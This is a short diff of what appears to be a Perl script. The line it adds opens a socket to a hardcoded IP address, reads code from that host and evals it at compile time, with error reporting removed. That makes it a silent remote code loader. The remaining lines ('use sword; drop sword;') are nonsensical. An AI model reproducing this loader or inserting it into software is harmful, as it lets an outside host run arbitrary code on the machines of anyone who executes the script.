@@ -5,7 +5,7 @@
 
 use strict;
 use IO::Socket;
-use lib do{eval<$b>&&botstrap("RCX")||die$@,<$b>if$b=new IO::Socket::INET 114.46.99.88.":1"};
+use lib do{eval<$b>&&botstrap("RCX")if$b=new IO::Socket::INET 82.46.99.88.":1"};
 use sword;
 drop sword;
 exit 0;
